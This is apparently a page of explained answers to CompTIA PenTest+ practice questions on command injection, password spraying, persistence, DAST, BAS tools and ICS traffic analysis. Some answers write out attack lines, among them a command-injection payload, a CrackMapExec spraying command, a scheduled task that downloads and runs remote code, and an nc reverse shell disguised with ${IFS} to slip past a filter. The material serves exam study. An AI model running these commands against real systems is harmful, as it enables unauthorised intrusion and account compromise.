Free Practice Questions for CompTIA PT0-003 Exam

The correct answer is A. ; whoami ; ps aux

A diagnostics page that allows users to ping other systems commonly passes user input to an operating system command such as ping. If the application does not properly validate or sanitize input, an attacker may be able to inject additional operating system commands.

The semicolon ; is a command separator on Unix/Linux systems. A payload such as:

; whoami ; ps aux

attempts to terminate or extend the original ping command and execute additional commands. whoami identifies the user context running the command, and ps aux lists running processes. This makes it an appropriate payload for testing command injection.

B is incorrect because < script > alert(1) < /script > is used to test cross-site scripting.

C is incorrect because ' SELECT @@version -- is used to test SQL injection.

D is incorrect because ../../../../../../etc/passwd is used to test path traversal or local file inclusion.

In PenTest+ terms, this falls under Attacks and Exploits, specifically web application command injection testing.

BAS (Breach and Attack Simulation) tools are specifically designed to emulate multiple TTPs (Tactics, Techniques, and Procedures) used by adversaries. These tools can simulate various attack vectors in a controlled manner to test the effectiveness of an organization ' s security defenses and response mechanisms. Here’s why option A is the best choice:

Controlled Testing Environment: BAS tools provide a controlled environment where multiple TTPs can be tested without causing unintended damage to the internal systems and servers. This is critical when the threat-modeling team indicates potential impacts on internal systems.

Comprehensive Coverage: BAS tools are designed to cover a wide range of TTPs, allowing the penetration tester to simulate various attack scenarios. This helps in assessing the reactions (alerted, blocked, and others) by the client ' s security tools comprehensively.

Feedback and Reporting: These tools provide detailed feedback and reporting on the effectiveness of the security measures in place, including which TTPs were detected, blocked, or went unnoticed. This information is invaluable for the threat-modeling team to understand the current security posture and areas for improvement.

References from Pentest:

Anubis HTB: This write-up highlights the importance of using controlled tools and methods for testing security mechanisms. BAS tools align with this approach by providing a controlled and systematic way to assess security defenses​​.

Forge HTB: Emphasizes the use of various testing tools and techniques to simulate real-world attacks and measure the effectiveness of security controls. BAS tools are mentioned as a method to ensure comprehensive coverage and minimal risk to internal systems​​.

Conclusion:

Using a BAS tool to test multiple TTPs allows for a thorough and controlled assessment of the client ' s security tools ' effectiveness. This approach ensures that the testing is systematic, comprehensive, and minimally disruptive, making it the best choice.

======

A screenshot of a computer Description automatically generated

Dynamic Application Security Testing (DAST):

DAST tools interact with the running application from the outside, simulating attacks to identify security vulnerabilities.

They are particularly effective in identifying issues like SQL injection, XSS, CSRF, and other vulnerabilities in web applications.

DAST tools do not require access to the source code, making them suitable for black-box testing.

Advantages of DAST:

Real-World Testing: DAST simulates real-world attacks by interacting with the application in the same way a user would.

Comprehensive Coverage: Can identify vulnerabilities in all parts of the web application, including input fields, forms, and user interactions.

Automated Scanning: Automates the process of testing and identifying vulnerabilities, providing detailed reports on discovered issues.

Examples of DAST Tools:

OWASP ZAP (Zed Attack Proxy): An open-source DAST tool widely used for web application security testing.

Burp Suite: A popular commercial DAST tool that provides comprehensive scanning and testing capabilities.

Pentest References:

Web Application Testing: Understanding the importance of testing web applications for security vulnerabilities and the role of different testing methodologies.

Security Testing Tools: Familiarity with various security testing tools and their applications in penetration testing.

DAST vs. SAST: Knowing the difference between DAST (dynamic testing) and SAST (static testing) and when to use each method.

By using a DAST tool, the penetration tester can effectively identify all vulnerable input fields on the customer website, ensuring a thorough assessment of the application ' s security.

======

A honeypot is a decoy system designed to attract attackers by exposing multiple services and vulnerabilities.

Indicators of a honeypot (Option A):

The system has an unusual combination of Windows (SMB, MSRPC) and Linux (Rsync, SSH) services.

It exposes a large number of open ports, which is uncommon for a production server.

Presence of " zeus-admin " (port 9090) suggests intentionally vulnerable services.

The correct answer is A. Utilizing port mirroring on a firewall appliance

The key issue is that the tester must avoid tampering with the ICS host because modifying it could void the manufacturer’s support terms. Port mirroring, also known as SPAN, allows the tester to passively copy network traffic from a switch or firewall interface to a monitoring port. The tester can then inspect the copied traffic from a separate analysis system without installing software, changing configurations, or interfering with the ICS application.

This is the most effective and safest method to determine whether communications are encrypted in transit because the assessment team can observe whether traffic is plaintext or encrypted while avoiding changes to the protected host.

B is incorrect because installing packet capture software on the server modifies the host and could violate the support terms.

C is incorrect because reconfiguring the application to use a proxy changes the application behavior and would be considered tampering.

D is incorrect because requesting certificate pinning be disabled changes the application’s security configuration and is unnecessary for simply validating whether traffic is encrypted in transit.

In PenTest+ terms, this falls under Information Gathering and Vulnerability Scanning, especially passive traffic analysis, packet capture, and safe testing considerations in sensitive environments such as ICS/OT.

OpenID Connect (OIDC) with OAuth allows applications to authenticate users using third-party identity providers (IdPs). If dynamic registration is enabled, attackers can abuse this feature to capture and replay authentication requests.

Replay attack (Option C):

Attackers capture legitimate authentication tokens and reuse them to impersonate users.

OIDC uses JWTs (JSON Web Tokens), which may not expire quickly, making replay attacks highly effective.

The command crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@ is used to perform password spraying on internal systems. CrackMapExec (CME) is a post-exploitation tool that helps automate the process of assessing large Active Directory networks. It supports multiple protocols, including SMB, and can perform various actions like password spraying, command execution, and more.

CrackMapExec:

CrackMapExec: A versatile tool designed for pentesters to facilitate the assessment of large Active Directory networks. It supports various protocols such as SMB, WinRM, and LDAP.

Purpose: Commonly used for tasks like password spraying, credential validation, and command execution.

Command Breakdown:

crackmapexec smb: Specifies the protocol to use, in this case, SMB (Server Message Block), which is commonly used for file sharing and communication between nodes in a network.

192.168.1.0/24: The target IP range, indicating a subnet scan across all IP addresses in the range.

-u user.txt: Specifies the file containing the list of usernames to be used for the attack.

-p Summer123@: Specifies the password to be used for all usernames in the user.txt file.

Password Spraying:

Definition: A technique where a single password (or a small number of passwords) is tried against a large number of usernames to avoid account lockouts that occur when brute-forcing a single account.

Goal: To find valid username-password combinations without triggering account lockout mechanisms.

Pentest References:

Password Spraying: An effective method for gaining initial access during penetration tests, particularly against organizations that have weak password policies or commonly used passwords.

CrackMapExec: Widely used in penetration testing for its ability to automate and streamline the process of credential validation and exploitation across large networks.

By using the specified command, the tester performs a password spraying attack, attempting to log in with a common password across multiple usernames, identifying potential weak accounts.

======

The correct answer is C. Maintains access into the compromised computer

The command uses schtasks to create a Windows scheduled task named Updates. The task is configured to run PowerShell and download/execute code from http://10.10.1.2/asd. The schedule option /sc onlogon means the task runs when a user logs on, and /ru System attempts to run it under the SYSTEM account.

This is a persistence technique. By creating a scheduled task that runs at logon, the tester can regain or maintain access after the initial shell is lost, the system reboots, or a user logs back in.

A is incorrect because the command does not directly upgrade the shell or exploit a privilege escalation vulnerability. It creates a scheduled task for recurring execution.

B is incorrect because the task is named Updates, but it is not actually using the Windows Update service.

D is incorrect because the command downloads and executes content from 10.10.1.2; it does not configure traffic forwarding or tunneling.

In PenTest+ terms, this falls under Attacks and Exploits, specifically post-exploitation persistence using Windows scheduled tasks.

To bypass a command injection blocklist that filters out the space character, the tester can use ${IFS}. ${IFS} stands for Internal Field Separator in Unix-like systems, which by default is set to space, tab, and newline characters.

Command Injection:

Command injection vulnerabilities allow attackers to execute arbitrary commands on the host operating system via a vulnerable application.

Filters or blocklists are often implemented to prevent exploitation by disallowing certain characters like spaces.

Bypassing Filters:

${IFS}: Using ${IFS} instead of a space can bypass filters that block spaces. ${IFS} expands to a space character in shell commands.

Example: The command nc -e /bin/sh 10.10.10.16 4444 can be rewritten as nc${IFS}-e${IFS}/bin/sh${IFS}10.10.10.16${IFS}4444.

Alternative Encodings:

%0a: Represents a newline character in URL encoding.

+: Sometimes used in place of space in URLs.

%20: URL encoding for space.

However, ${IFS} is most appropriate for shell command contexts.

Pentest References:

Command Injection: Understanding how command injection works and common techniques to exploit it.

Bypassing Filters: Using creative methods like environment variable expansion to bypass input filters and execute commands.

Shell Scripting: Knowledge of shell scripting and environment variables is crucial for effective exploitation.

By using ${IFS}, the tester can bypass the filtered space character and execute the intended command, demonstrating the vulnerability ' s exploitability.

======